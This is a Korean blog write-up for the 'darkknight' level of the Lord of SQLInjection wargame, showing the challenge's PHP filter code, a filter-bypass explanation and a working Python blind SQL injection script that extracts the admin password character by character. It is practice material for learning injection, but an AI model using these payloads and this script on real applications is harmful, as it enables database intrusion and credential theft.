[LOS] darkknight 풀이

 

PHP & query 
<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); 
  if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); 
  if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe"); 
  $query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight"); 
  highlight_file(__FILE__); 
?>
select id from prob_darkknight where id='guest' and pw='' and no=

 

문제 풀이

더보기
solve 조건
 
$result = @mysqli_fetch_array(mysqli_query($db,$query));

Blind Injection을 이용해 해결한다

 

 

 

특수문자 제약
 if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); 
 if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); 
 if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe");

 싱글 쿼터와 substr을 사용하지 못한다. ""와 (left,mid,right) 함수를 활용한다.

 

 

Python code
import requests

URL='https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php'
headers = {'Content-Type': 'application/json; charset=utf-8'}
cookies = {'PHPSESSID': '내 쿠기 값'}
password = ''
length=0;

for i in range(100):
    query={'no': '-1 or id like 0x61646D696E and length(pw) like '+str(i)+' # '}
    res=requests.get(URL, params=query, headers=headers, cookies=cookies)
    if('Hello admin' in res.text):
        print(i)
        length=i;
    
    
for i in range(length):
    for j in range(ord('0'),ord('z')+1):
        query={'no': '-1 || id like 0x61646D696E and left(pw,'+str(i+1)+') like \"' +password + chr(j)+ '\"#'}
        res=requests.get(URL, params=query, headers=headers, cookies=cookies)
        if('Hello admin' in res.text):
            password = password + chr(j)
            print(password)
            break;

 

 

 

URL

los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?pw=0b70ea1f

 

 

 

 

 

'CTF > LOS' 카테고리의 다른 글

[LOS] glant 풀이- 14번  (0) 2020.09.16
[LOS] bugbear 풀이 - 13번  (0) 2020.09.16
[LOS] golem 풀이 - 11번  (0) 2020.09.16
[LOS] skeleton 풀이 - 10번  (0) 2020.09.15
[LOS] vampire 풀이 - 9번  (0) 2020.09.15

+ Recent posts

티스토리툴바